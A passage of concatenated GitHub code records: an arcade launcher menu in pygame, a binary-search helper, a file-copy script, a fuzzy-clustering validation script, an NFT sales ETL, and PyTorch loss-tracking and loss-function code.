seconds\", 'logout_timer')\n\n def custom_joy_apply(event, _) -> bool:\n \"\"\"\n Custom widget apply event.\n \"\"\"\n condition = event.button == 10\n return condition\n\n new_ctrl_sel = ctrl.Controller()\n # new_ctrl_sel.joy_delay = 200 # ms\n new_ctrl_sel.joy_select = custom_joy_apply\n soloGameSelector = self.soloGamesListMenu.add.selector(\n title='Choose a game ',\n items=self.__getAvailablesGames(mode='solo'),\n default=0,\n onchange=self.__updateSoloScoreboard,\n onreturn=self.__launchSoloGame,\n )\n soloGameSelector.set_controller(new_ctrl_sel)\n\n self.soloScoreboard = self.soloGamesListMenu.add.table()\n self.soloScoreboard.translate(0, 40)\n self.soloScoreboard.default_cell_padding = 20\n self.soloScoreboard.add_row(['#RANK', 'Epitech login', \"SCORE\"], cell_font=self.arcadeFont20, cell_font_color='white')\n scoreboard = soloGameSelector.get_value()[0][1].scoreboards['SOLO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'slategray3', 'darkorange3']\n self.soloScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.soloScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.soloScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.soloScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n else:\n self.soloGamesListMenu.add.label(\"No games found\", max_char=-1)\n self.soloGamesListMenu.add.label(\"Student login: None\", 'login_message')\n self.soloGamesListMenu.add.label(\"Credit state unknown\", 'credit_message')\n\n # DUO\n self.duoGamesListMenu = pygame_menu.Menu(title=\"Games List (DUO)\", width=1600, height=900, theme=mainTheme)\n if len(self.__getAvailablesGames(mode='duo')):\n duoGameSelector = self.duoGamesListMenu.add.selector(\n title='Choose a game ',\n items=self.__getAvailablesGames(mode='duo'),\n default=0,\n # onchange = self.__updateDuoScoreboard,\n onreturn=self.__launchDuoGame,\n )\n\n self.duoScoreboard = self.duoGamesListMenu.add.table()\n self.duoScoreboard.translate(0, 40)\n self.duoScoreboard.default_cell_padding = 20\n self.duoScoreboard.add_row(['#RANK', 'Epitech login', 'SCORE'], cell_font=self.arcadeFont20, cell_font_color='white')\n scoreboard = duoGameSelector.get_value()[0][1].scoreboards['DUO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'slategray3', 'darkorange3']\n self.duoScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.duoScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.duoScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.duoScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n else:\n self.duoGamesListMenu.add.label(\"No games found\", max_char=-1)\n \n #IN GAME MENU\n self.inGameMenu = pygame_menu.Menu(title=\"\", width=1600, height=900, theme=mainTheme)\n self.inGameMenu.add.label(\"Game is still running\", max_char=-1)\n\n\n def __loadAvailableGames(self):\n mainFolder = './games'\n gameFolders = [name for name in os.listdir(mainFolder) if os.path.isdir(os.path.join(mainFolder, name))]\n for gameName in gameFolders:\n config = Misc.read_yaml(file_path=mainFolder + \"/\" + gameName + 
\"/config.yaml\")\n self.availableGames[gameName] = Game(name=gameName, config=config)\n\n def runPyGame(self):\n fps = 60\n fpsClock = pygame.time.Clock()\n screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n pygame.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\n\n self.__loadAvailableGames()\n self.__initComponents()\n\n # Main game loop.\n dt = 1 / fps\n student_login = None\n while True:\n self.__update(dt)\n self.__draw(screen)\n if self.view == View.LOGIN_MENU:\n if student_login is None:\n student_login = self.jadoor.read()\n else:\n self.connectedUsers[0] = User(student_login)\n student_login = None\n self.view = View.SOLO_GAMES_LIST_MENU\n self.soloGamesListMenu.get_widget('login_message').set_title(\"Login: \" + self.connectedUsers[0].login)\n self.soloGamesListMenu.get_widget('credit_message').set_title(\"Credits: \" + str(int(self.credit.check(self.connectedUsers[0].login))))\n self.logout_timer = 1800\n self.soloGamesListMenu.get_widget('logout_timer').set_title(\"Logout in \" + str(int(self.logout_timer / 60)) + \" seconds\")\n elif self.view in [View.SOLO_GAMES_LIST_MENU, View.DUO_GAMES_LIST_MENU]:\n self.soloGamesListMenu.get_widget('logout_timer').set_title(\"Logout in \" + str(int(self.logout_timer / 60)) + \" seconds\")\n self.logout_timer -= 1\n if self.logout_timer == 0:\n self.view = View.LOGIN_MENU\n self.connectedUsers = [None]\n dt = fpsClock.tick(fps)\n","repo_name":"Valipss/epiarcade","sub_path":"src/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":13153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3709989797","text":"from typing import List, Union\n\nnumeric = Union[int, float]\n\n\ndef find_target(arr: List[numeric], target: numeric) -> numeric:\n \"\"\"Find rightmost value less than or equal to target\"\"\"\n lo = 0\n hi = len(arr)\n while lo < hi:\n mid = (lo + hi) // 2\n if target < arr[mid]:\n hi = mid\n else:\n lo = mid + 1\n\n return arr[lo - 1]\n\n\ndef rightmost_value_in_sorted_array(arr: List[numeric], target: numeric) -> numeric:\n \"\"\"\n Find the rightmost value less than or equal to target in arr sorted array.\n :param arr: sorted array [int, float]\n :param target: target value [int, float]\n :return: the rightmost value or -1 if not found/error\n \"\"\"\n # Edge cases\n if type(target) in [int, float]:\n if len(arr) == 0:\n return -1\n elif len(arr) == 1:\n return arr[0]\n elif target <= arr[0]:\n return arr[0]\n elif target >= arr[-1]:\n return arr[-1]\n # Binary search\n else:\n return find_target(arr, target)\n\n return -1\n\n\nif __name__ == \"__main__\":\n a = [3, 4, 6, 9, 10, 12, 14, 15, 17, 19, 21]\n t = [12, 13]\n for i in t:\n print(f\"Output: {rightmost_value_in_sorted_array(a, i)}\")\n","repo_name":"Callaghan-Hattingh/rightmost_value_in_sorted_array_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22247347231","text":"import argparse\nimport os\nimport shutil\nfrom pathlib import Path\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Copy all files with given extension from src to dst\")\n parser.add_argument('-e', '--ext', default=None, help=\"Extension to copy\")\n parser.add_argument('-s', '--src', help=\"Src Directory\")\n parser.add_argument('-d', '--dst', help=\"Dst Directory\")\n args = parser.parse_args()\n for (path, dirs, files) 
in os.walk(args.src):\n pathExt = path[len(args.src)+1:]\n #print(\"EXT: {0}\".format(pathExt))\n for file in files:\n srcF = os.path.join(path, file)\n dstF = os.path.join(args.dst, pathExt, file)\n dstDir = os.path.dirname(dstF)\n #print(\"{0} {1} {2}\".format(srcF, dstF, dstDir))\n if args.ext is None or srcF.endswith(args.ext):\n if not os.path.exists(dstDir):\n Path(dstDir).mkdir(parents=True, exist_ok=True)\n print(\"Copy {0} to {1}\".format(srcF, dstF))\n shutil.copy(srcF, dstF)","repo_name":"microsoft/KubeDevice","sub_path":"hack/extcopy.py","file_name":"extcopy.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"33432456062","text":"from __future__ import annotations\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom constant import PICKLE\nfrom datatype.dataset import Dataset\nfrom fcmeans import FCM\nfrom textwrap import dedent\n\npd.set_option('display.max_colwidth', None)\n\n\ndef main() -> None:\n dataset = Dataset('segment')\n dataframe = dataset.load()\n\n print(dataframe[['filename', 'fcm_label_2d']])\n\n unique = dataframe.fcm_label_2d.unique()\n unique.sort()\n\n # print(unique)\n\n # size = [\n # len(dataframe[dataframe.fcm_label_2d == label])\n # for label in unique\n # ]\n\n # minimum = min(size)\n # maximum = max(size)\n\n # print(minimum, maximum)\n\n for index in range(1, 11):\n print(f\"[Trial {index}]\")\n\n n = 400\n small = []\n\n for label in unique:\n subset = dataframe[dataframe.fcm_label_2d == label]\n length = len(subset)\n\n # print(f\"{n} samples from a total of {length} for cluster {label}\")\n\n sample = subset.sample(n=n)\n small.append(sample)\n\n subset = pd.concat(small)\n\n columns = {'fcm_label_2d': 'fcm_label_2d_original'}\n subset = subset.rename(columns=columns)\n\n x = np.array(\n [\n subset.umap_x_2d,\n subset.umap_y_2d\n ]\n ).transpose()\n\n fcm = FCM(\n m=1.5,\n max_iter=150,\n n_clusters=19\n )\n\n fcm.fit(x)\n\n labels = fcm.predict(x)\n\n subset['fcm_label_2d_validation'] = labels\n\n dataset = Dataset('subset')\n dataset.save(subset)\n\n print(subset[['filename', 'fcm_label_2d_original', 'fcm_label_2d_validation']])\n\n\n comparison = (\n subset['fcm_label_2d_original'] ==\n subset['fcm_label_2d_validation']\n )\n\n length = len(comparison)\n\n percentage = (comparison.sum() / length) * 100\n percentage = round(percentage, 2)\n\n print(f\"{percentage}% \\n\")\n\n # figsize = (10, 8)\n # fig, ax = plt.subplots(figsize=figsize)\n\n # subset['fcm_label_2d_original'].value_counts().sort_index().plot(ax=ax, kind='bar')\n\n # plt.xlabel('FCM Label')\n # plt.ylabel('Count')\n # plt.title('FCM Label 2D: Original')\n\n # plt.show()\n\n # figsize = (10, 8)\n # fig, ax = plt.subplots(figsize=figsize)\n\n # subset['fcm_label_2d_validation'].value_counts().sort_index().plot(ax=ax, kind='bar')\n\n # plt.xlabel('FCM Label')\n # plt.ylabel('Count')\n # plt.title('FCM Label 2D: Validation')\n\n # plt.show()\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/analysis/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16444132220","text":"import pandas as pd\nfrom reports.quarterly_etl import QuarterlyReport\nfrom sources.nftrade import NftradeExtractor, NftradeTransformer\nfrom quarterlyReport.nft.coingecko import 
prices\n\n\ndef get_data(price_file_path=\"../coingecko/prices_raw.csv\",\n start=QuarterlyReport().start_time,\n end=QuarterlyReport().end_time):\n chain = \"moonbeam\"\n df_prices = prices.get_data(price_file_path, chain, start, end)\n\n start, end = [t.strftime(\"%Y-%m-%d\") for t in [start, end]]\n data_all = []\n skip = 0\n i = 0\n while True:\n data = NftradeExtractor().extract(skip)\n data_all += data\n if data[-1][\"createdAt\"] > start:\n i += 1\n skip = NftradeExtractor().limit * i\n else:\n break\n df = NftradeTransformer(data_all).to_frame()\n\n df = df.query(\"@start <= createdAt <= @end and type == 'SOLD'\").copy()\n df[\"date\"] = df[\"createdAt\"].str.slice(stop=10)\n df = df.merge(df_prices)\n df[\"totalUSD\"] = df[\"price\"].astype(float) * df[\"prices\"]\n df = df.reindex(columns=[\"date\", \"totalUSD\"])\n\n index = pd.date_range(start, end, freq=\"1D\",\n name=\"date\").strftime(\"%Y-%m-%d\")[:-1]\n df = df.groupby(\"date\").sum().reindex(index=index, fill_value=0)\n df[\"chain\"] = chain\n df.reset_index(inplace=True)\n\n return df\n\n\nif __name__ == \"__main__\":\n sales = get_data()\n print(sales)\n","repo_name":"tara-nguyen/crypto-data","sub_path":"quarterlyReport/nft/nftrade/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5283123155","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, os\nimport argparse\n\nfrom . import wrapper\n\nplt.ioff()\n\n##############################################################################################################\n\nclass TRAINING_LOSS():\n\t\"\"\"\n\tManages data regarding the evoluction of a model's loss in training. 
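\n\t# Illustrative usage sketch (\"model\" and \"plots\" are placeholder values): t = TRAINING_LOSS(); t.set_params(mymodel=model, plot_path=\"plots\"); call t.add(loss, patience) after each epoch, then t.save() and t.plot().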
\n\t\"\"\"\n\tdef __init__(self):\n\t\t\n\t\tself.default_params = wrapper.PARAM_WRAPPER().get_default_params(\"training_loss\")\n\t\tself.params = self.default_params.copy()\n\n\t\tself.loss_graph = [[]]\n\t\tself.patience_graph = [[]]\n\t\tself.plot_loss = None\n\n\t\treturn\n\n\tdef set_params(self, **kwargs):\n\n\t\tparam_names = self.default_params.keys()\n\t\tfor i,j in kwargs.items():\n\t\t\tif i in param_names: self.params[i] = j\n\n\t\tself.update_params()\n\t\tself.update_names()\n\n\t\treturn\n\n\tdef update_params(self):\n\t\tfor k, v in self.params.items():\n\t\t\tsetattr(self, k, v)\n\t\treturn\n\n\tdef update_names(self):\n\t\t# CHECK\n\t\tfor key, val in self.params.items(): # param_path not needed to load the model\n\t\t\tif val is None: return \"ERROR (TRAINING_LOSS.update_names): param '{}' is None\".format(key)\n\n\t\tself.plot_loss = self.plot_path + \"/loss_\" + self.mymodel.name\n\t\tself.plot_loss_complete = self.plot_path + \"/loss_complete_\" + self.mymodel.name\n\n\t\treturn None\n\n\tdef load_data(self):\n\t\t# CHECK\n\t\tfor key in self.params.keys():\n\t\t\tif self.params[key] is None: return \"ERROR (TRAINING_LOSS.load_data): param '{}' is None\".format(key)\n\n\t\ttry:\n\t\t\tself.loss_graph, self.patience_graph = torch.load(self.plot_loss)\n\t\texcept:\n\t\t\treturn \"ERROR (TRAINING_LOSS.load_data): error occurred while loading loss data from '{}'\".format(self.plot_loss)\n\n\t\treturn None\n\n\tdef add(self, plot, patience):\n\t\tself.loss_graph[-1] += [plot]\n\t\tself.patience_graph[-1] += [patience]\n\t\treturn\n\n\tdef restart(self):\n\t\tself.loss_graph += [[]]\n\t\tself.patience_graph += [[]]\n\t\treturn\n\n\tdef save(self):\n\t\ttorch.save([self.loss_graph, self.patience_graph], self.plot_loss)\n\t\treturn\n\n\tdef plot(self):\n\t\t# CHECKING\n\t\tplt.cla()\n\t\tif len(self.loss_graph) == [[]]: \n\t\t\terror = self.load_data()\n\t\t\tif error != None: return error\n\t\tif len(self.loss_graph) == [[]]: return \"ERROR (TRAINING_LOSS.plot): Empty data\"\n\n\t\tloss, patience = self.loss_graph, self.patience_graph\n\t\tif len(loss[-1])==0: loss=loss[:-1]; patience=patience[:-1]\n\n\t\t# CREATE X, Y\n\t\tloss = [np.array(loss_i) for loss_i in loss]\n\t\tcolors = [\"blue\", \"red\"]\n\t\tepoch = [np.array(range(len(loss[0]))) + 1]\n\t\tfor i in np.arange(1, len(loss)): \n\t\t\tepoch += [np.array(range(len(loss[i]))) + epoch[-1][-1] + 1]\n\n\t\t# CREATE PLOT\n\t\tif \"MLP\" in self.mymodel.mod: \n\t\t\tfig1 = plt.figure(3, figsize=[7,5])\n\t\t\tax11 = fig1.add_subplot(111)\n\t\t\tax11.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tif (\"BCE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 200):\n\t\t\t\tax11.set_ylim(0, 200)\n\t\t\telif (\"CE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 20):\n\t\t\t\tax11.set_ylim(0, 20)\n\t\tif (\"VAE\" in self.mymodel.mod) or (\"flow\" in self.mymodel.mod): \n\t\t\tfig1 = plt.figure(3, figsize=[7*3,5])\n\t\t\tax11 = fig1.add_subplot(131)\n\t\t\tax12 = fig1.add_subplot(132)\n\t\t\tax13 = fig1.add_subplot(133)\n\t\t\tax11.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tax12.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tax13.set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\tif (\"BCE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 200):\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 100])\n\t\t\t\tax11.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = 
np.min([np.min(loss[0][:,1]), np.min(loss[1][:,1]), np.min(loss[2][:,1])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,1]), self.mymodel.beta*1E4])\n\t\t\t\tax12.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 100])\n\t\t\t\tax13.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\t\t\telif (\"CE\" in self.mymodel.loss) and (np.max([np.max(i) for i in loss]) > 20):\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 15])\n\t\t\t\tax11.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,1]), np.min(loss[1][:,1]), np.min(loss[2][:,1])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,1]), self.mymodel.beta*1E4])\n\t\t\t\tax12.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t\t\tymin = np.min([np.min(loss[0][:,0]), np.min(loss[1][:,0]), np.min(loss[2][:,0])])\n\t\t\t\tymax = np.min([np.max(loss[0][:,0]), 15])\n\t\t\t\tax13.set_ylim(ymin - 0.05*(ymax - ymin), ymax + 0.05*(ymax - ymin))\n\n\t\t# PLOTTING\n\t\tfor i, (loss_i, epoch_i, patience_i) in enumerate(zip(loss, epoch, patience)):\n\n\t\t\tif \"MLP\" in self.mymodel.mod:\n\t\t\t\tax11.plot(epoch_i, loss_i, \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax11.plot(epoch_i, loss_i, \".\", color=colors[i%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch_i[p], loss_i[p]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\tax11.plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\n\n\t\t\tif (\"VAE\" in self.mymodel.mod) or (\"flow\" in self.mymodel.mod): \n\t\t\t\tax11.plot(epoch_i, loss_i[:,0], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax12.plot(epoch_i, loss_i[:,1], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax13.plot(epoch_i, loss_i[:,2], \"-\", color=colors[i%2], linewidth=1)\n\t\t\t\tax11.plot(epoch_i, loss_i[:,0], \".\", color=colors[i%2], markersize=3)\n\t\t\t\tax12.plot(epoch_i, loss_i[:,1], \".\", color=colors[i%2], markersize=3)\n\t\t\t\tax13.plot(epoch_i, loss_i[:,2], \".\", color=colors[i%2], markersize=3)\n\t\t\t\te_p0 = np.array([[epoch_i[p], loss_i[p,0]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\te_p1 = np.array([[epoch_i[p], loss_i[p,1]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\te_p2 = np.array([[epoch_i[p], loss_i[p,2]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\tif len(e_p0) != 0:\n\t\t\t\t\tax11.plot(e_p0[:,0], e_p0[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\tif len(e_p1) != 0:\n\t\t\t\t\tax12.plot(e_p1[:,0], e_p1[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\tif len(e_p2) != 0:\n\t\t\t\t\tax13.plot(e_p2[:,0], e_p2[:,1], \".\", color=\"black\", markersize=3)\n\n\t\t# SAVE PLOT\n\t\tfig1.tight_layout()\n\t\tfig1.savefig(self.plot_loss + \".pdf\", format=\"pdf\", bbox_inches='tight')\n\n\t\tplt.cla()\n\t\tfig1.clf()\n\t\tdel ax11, fig1\n\n\t\treturn None\n\n\tdef plot_complete(self):\n\t\t\"\"\"\n\t\tloss, patience = torch.load()\n\t\tlen(loss) = nº restarts\n\t\tlen(loss[i]) = nº epochs in each restart\n\t\tlen(loss[i][j]) = nº of losses in this model\n\t\t(same for patience)\n\n\t\t\t\tALL RESTART1 ... 
RESTARTN\n\t\tLOSS1\n\t\t...\n\t\tLOSSN\n\n\t\t\"\"\"\n\t\t# CHECKING\n\t\tplt.cla()\n\t\tif len(self.loss_graph) == [[]]: \n\t\t\terror = self.load_data()\n\t\t\tif error != None: return error\n\t\tif len(self.loss_graph) == [[]]: return \"ERROR (TRAINING_LOSS.plot_complete): Empty data\"\n\n\t\tloss, patience = self.loss_graph, self.patience_graph\n\t\tif loss == [[]]: return\n\t\tif len(loss[-1])==0: loss=loss[:-1]; patience=patience[:-1]\n\n\t\t#DATA\n\t\tNrestarts = len(loss)\n\t\tNlosses = len(loss[0][0])\n\t\tloss = [np.array(loss_i) for loss_i in loss]\n\t\tcolors = [\"blue\", \"red\"]\n\t\tepoch = [np.array(range(len(loss[0]))) + 1]\n\t\tfor i in np.arange(1, len(loss)): \n\t\t\tepoch += [np.array(range(len(loss[i]))) + epoch[-1][-1] + 1]\n\n\t\t# CREATES AXES\n\t\tfig1 = plt.figure(4, figsize=[7*(Nrestarts + 1),5*Nlosses])\n\t\taxes = []\n\t\tfor i in range(Nlosses*(Nrestarts+1)):\n\t\t\taxes += [fig1.add_subplot(Nlosses, Nrestarts+1, i+1)]\n\n\t\t# SETS AXES LIMITS\n\t\taxes_i = 0\n\t\tfor i in range(Nlosses):\n\t\t\taxes[axes_i].set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\taxes_i += 1\n\t\t\tfor j in np.arange(1, Nrestarts+1, 1):\n\t\t\t\taxes[axes_i].set_xlim(epoch[j-1][0], epoch[j-1][-1])\n\t\t\t\taxes_i += 1\n\n\t\taxes_i = 0\n\t\tfor i in range(Nlosses):\n\t\t\t# PLOT ALL\n\t\t\tfor j in range(Nrestarts):\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \"-\", color=colors[j%2], linewidth=1)\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \".\", color=colors[j%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch[j][p], loss[j][p,i]] for p in range(len(patience[j])) if patience[j][p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\taxes[axes_i].plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\t\t\taxes_i += 1\n\n\t\t\tfor j in range(Nrestarts):\n\t\t\t\t# PLOT RESTART_i\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \"-\", color=colors[j%2], linewidth=1)\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \".\", color=colors[j%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch[j][p], loss[j][p,i]] for p in range(len(patience[j])) if patience[j][p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\taxes[axes_i].plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\taxes_i += 1\n\n\t\t# SAVE PLOT\n\t\tfig1.tight_layout()\n\t\tfig1.savefig(self.plot_loss_complete + \".pdf\", format=\"pdf\", bbox_inches='tight')\n\n\t\tplt.cla()\n\t\tfig1.clf()\n\t\tdel axes, fig1\n\n\t\treturn None\n\n##############################################################################################################\n\nclass LOSS():\n\t\"\"\"\n\tLoss functions for the optimizer of the model. 
\n\t\"\"\"
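\n\t# Usage note (illustrative): each *_loss method returns the pair [loss_for_backprop, detached_tensor_of_loss_terms]; e.g. BCE_loss below returns [loss, torch.Tensor([loss.item()])].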
\n\t\"\"\"\n\tdef __init__(self, mymodel):\n\t\tself.Nsongs = mymodel.Nsongs\n\t\tself.beta = mymodel.beta\n\t\tself.dim = mymodel.dim\n\t\tself.BCELoss = torch.nn.BCELoss() # default reduction=mean\n\t\tself.GAUSS_CTE = -0.5*self.dim[-1]*np.log(2*np.pi).item()\n\t\tself.weight_epoch = lambda epoch: [1.,self.beta] # weights for losses in function of the epoch\n\t\treturn\n\n\tdef BCE_loss(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.sigmoid(ynew) #+ 1E-10 #from 0 to 1 for log\n\t\tloss = self.BCELoss(ynew, y)*self.Nsongs #input, target\n\t\treturn [loss, torch.Tensor([loss.item()])]\n\n\tdef BCE_loss2(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.sigmoid(ynew) #+ 1E-10 #from 0 to 1 for log\n\t\tloss = -torch.sum(y*torch.log(ynew + 1E-10) + (1-y)*torch.log(1-ynew + 1E-10), 1) / y.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef CE_loss(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.softmax(ynew, 1) #normalization for ynew being a pdf\n\t\tloss = -torch.sum(y*torch.log(ynew + 1E-10), 1)/y.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef BCEKLD_loss(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossBCE = self.weight_epoch(epoch)[0]*self.BCE_loss(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossBCE + lossKLD, torch.Tensor([lossBCE.item(), lossKLD.item(), lossBCE.item() + lossKLD.item()])]\n\n\tdef BCEKLD_loss2(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossBCE = self.weight_epoch(epoch)[0]*self.BCE_loss2(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossBCE + lossKLD, torch.Tensor([lossBCE.item(), lossKLD.item(), lossBCE.item() + lossKLD.item()])]\n\n\tdef CEKLD_loss(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossCE = self.weight_epoch(epoch)[0]*self.CE_loss(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossCE + lossKLD, torch.Tensor([lossCE.item(), lossKLD.item(), lossCE.item() + lossKLD.item()])]\n\n\tdef FLOW_loss(self, y, h, logdet): #y, ynew, pars\n\t\tsize = h.size()[1]\n\t\tlossp = (self.GAUSS_CTE - 0.5*h.pow(2).sum(1).mean())/size #sum all dim elements, mean for all batches\n\t\tlossdet = logdet/size\n\t\treturn [- lossp - lossdet, torch.Tensor([- lossp.item(), -lossdet.item(), - lossp.item() - lossdet.item()])]\n\n\tdef FOCAL_loss(self, y, x, pars): #y, ynew, pars\n\t\talpha = 0.25 #controls data imbalance, 0.5 if balanced\n\t\tgamma = 2.0\n\n\t\tt = y.float()\n\n\t\tp = x.sigmoid().detach()\n\t\tpt = p*t + (1-p)*(1-t) # pt = p if t > 0 else 1-p\n\t\tw = alpha*t + (1-alpha)*(1-t) # w = alpha if t > 0 else 1-alpha\n\t\tw = w * (1-pt).pow(gamma)\n\t\tloss = torch.nn.functional.binary_cross_entropy_with_logits(x, t, w, reduction='mean') #input, target, weight\n\t\tloss = loss*self.Nsongs\n\t\treturn [loss, torch.Tensor([loss.item()])]\n\n\tdef FOCAL_loss2(self, y, x, pars): #y, ynew, pars\n\t\talpha = 0.25 #controls data imbalance, 0.5 if balanced\n\t\tgamma = 2.0\n\n\t\tt = y.float()\n\t\tx = torch.sigmoid(x.float())\n\n\t\tp = x.detach()\n\t\tpt = p*t + (1-p)*(1-t) # pt = p if t > 0 else 1-p\n\t\tw = alpha*t + (1-alpha)*(1-t) # w = alpha if t > 0 else 1-alpha\n\t\tw = w * 
(1-pt).pow(gamma)\n\t\tloss = -torch.sum(w*(t*torch.log(x + 1E-10) + (1-t)*torch.log(1-x + 1E-10)), 1) / t.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef FOCALKLD_loss(self, y, x, pars, epoch=1): #y, ynew, pars\n\t\tmu, logvar = pars #VAE\n\t\tlossF = self.weight_epoch(epoch)[0]*self.FOCAL_loss(y, x, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossF + lossKLD, torch.Tensor([lossF.item(), lossKLD.item(), lossF.item() + lossKLD.item()])]\n\n\tdef FOCALKLD_loss2(self, y, x, pars, epoch=1): #y, ynew, pars\n\t\tmu, logvar = pars #VAE\n\t\tlossF = self.weight_epoch(epoch)[0]*self.FOCAL_loss2(y, x, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossF + lossKLD, 